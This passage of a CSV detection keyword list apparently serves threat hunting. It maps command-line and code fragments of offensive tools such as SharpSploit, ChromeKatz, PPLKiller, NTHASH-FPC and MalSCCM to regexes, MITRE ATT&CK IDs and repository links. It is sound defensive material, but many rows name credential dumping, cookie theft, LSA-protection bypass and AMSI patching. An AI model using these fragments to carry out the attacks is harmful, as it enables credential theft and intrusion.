T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.DCSync(System.String*",".{0,1000}\.DCSync\(System\.String.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - 
T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.dev.123456.*",".{0,1000}\.dev\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.dns2tcpdrc*",".{0,1000}\.dns2tcpdrc.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*.doc.bat*",".{0,1000}\.doc\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious 
extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.dll*",".{0,1000}\.doc\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.exe*",".{0,1000}\.doc\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.htm*",".{0,1000}\.doc\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.iso*",".{0,1000}\.doc\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.jar*",".{0,1000}\.doc\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.js*",".{0,1000}\.doc\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.sfx*",".{0,1000}\.doc\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.doc.vbs*",".{0,1000}\.doc\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious 
extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.bat*",".{0,1000}\.docx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.dll*",".{0,1000}\.docx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.exe*",".{0,1000}\.docx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.htm*",".{0,1000}\.docx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.iso*",".{0,1000}\.docx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.jar*",".{0,1000}\.docx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.jasmin*",".{0,1000}\.docx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.docx.js*",".{0,1000}\.docx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.sfx*",".{0,1000}\.docx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.docx.vbs*",".{0,1000}\.docx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.Enumeration.Domain.Credential*",".{0,1000}\.Enumeration\.Domain\.Credential.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Domain.SPNTicket*",".{0,1000}\.Enumeration\.Domain\.SPNTicket.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Keylogger*",".{0,1000}\.Enumeration\.Keylogger.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Keylogger.*",".{0,1000}\.Enumeration\.Keylogger\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Network.PortScanResult*",".{0,1000}\.Enumeration\.Network\.PortScanResult.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*.Enumeration.Registry.GetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.GetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.Enumeration.Registry.SetRegistryKey(*",".{0,1000}\.Enumeration\.Registry\.SetRegistryKey\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.events.123456.*",".{0,1000}\.events\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.exe /HistorySource 1 /SaveDirect /scomma *",".{0,1000}\.exe\s\s\/HistorySource\s1\s\/SaveDirect\s\/scomma\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe /logonpasswords /symbol*",".{0,1000}\.exe\s\s\/logonpasswords\s\/symbol.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*.exe --b64 --path * --args ",".{0,1000}\.exe\s\s\-\-b64\s\-\-path\s.{0,1000}\s\-\-args\s","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*.exe --buildcache -c 
*\cache.txt*",".{0,1000}\.exe\s\s\-\-buildcache\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*.exe certificates /pvk:*.pvk*",".{0,1000}\.exe\s\scertificates\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe -group=remote -computername=*",".{0,1000}\.exe\s\s\-group\=remote\s\-computername\=.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe * -eventlog *Key Management Service*",".{0,1000}\.exe\s.{0,1000}\s\-eventlog\s.{0,1000}Key\sManagement\sService.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*.exe * --source Persistence*",".{0,1000}\.exe\s.{0,1000}\s\-\-source\sPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*.exe *.bin -enc aes -lang csharp*",".{0,1000}\.exe\s.{0,1000}\.bin\s\-enc\saes\s\-lang\scsharp.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.exe *-searchforest*-pwdlastset*",".{0,1000}\.exe\s.{0,1000}\-searchforest.{0,1000}\-pwdlastset.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","2","117","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" "*.exe .\chrome.DMP*",".{0,1000}\.exe\s\.\\chrome\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from 
Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*.exe .\msedge.DMP*",".{0,1000}\.exe\s\.\\msedge\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*.exe /disableLSAProtection*",".{0,1000}\.exe\s\/disableLSAProtection.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*.exe /gethmac /mode:SHA1 /key:*",".{0,1000}\.exe\s\/gethmac\s\/mode\:SHA1\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*.exe /HistorySource 1 /LoadChrome 1 /shtml *",".{0,1000}\.exe\s\/HistorySource\s1\s\/LoadChrome\s1\s\/shtml\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll 
/remoteserver:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}\s\/trigger\:.{0,1000}\s\/modifier\:.{0,1000}\s\/program\:.{0,1000}\s\/argument\:.{0,1000}\.dll\s\/remoteserver\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*.exe 3 cmd*",".{0,1000}\.exe\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*.exe acl -dn * -scope * -trustee *",".{0,1000}\.exe\sacl\s\-dn\s.{0,1000}\s\-scope\s.{0,1000}\s\-trustee\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe --ACLScan * --OU *",".{0,1000}\.exe\s\-\-ACLScan\s.{0,1000}\s\-\-OU\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*.exe action=GetScheduledTaskCOMHandler*",".{0,1000}\.exe\saction\=GetScheduledTaskCOMHandler.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - 
T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListRunningServices*",".{0,1000}\.exe\saction\=ListRunningServices.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListScheduledTasks*",".{0,1000}\.exe\saction\=ListScheduledTasks.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListTaskNames*",".{0,1000}\.exe\saction\=ListTaskNames.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe --adcs * --remote *",".{0,1000}\.exe\s\-\-adcs\s.{0,1000}\s\-\-remote\s.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*.exe AlwaysInstallElevated*",".{0,1000}\.exe\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp 
functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe app /create /name:* /uncpath:*\\*",".{0,1000}\.exe\sapp\s\/create\s\/name\:.{0,1000}\s\/uncpath\:.{0,1000}\\\\.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*.exe app /deploy /name:* /groupname:* /assignmentname:*",".{0,1000}\.exe\sapp\s\/deploy\s\/name\:.{0,1000}\s\/groupname\:.{0,1000}\s\/assignmentname\:.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*.exe asktgs /ticket:B64_TGT /service:*",".{0,1000}\.exe\sasktgs\s\/ticket\:B64_TGT\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*.exe asktgt /user:* /aes256:* /opsec 
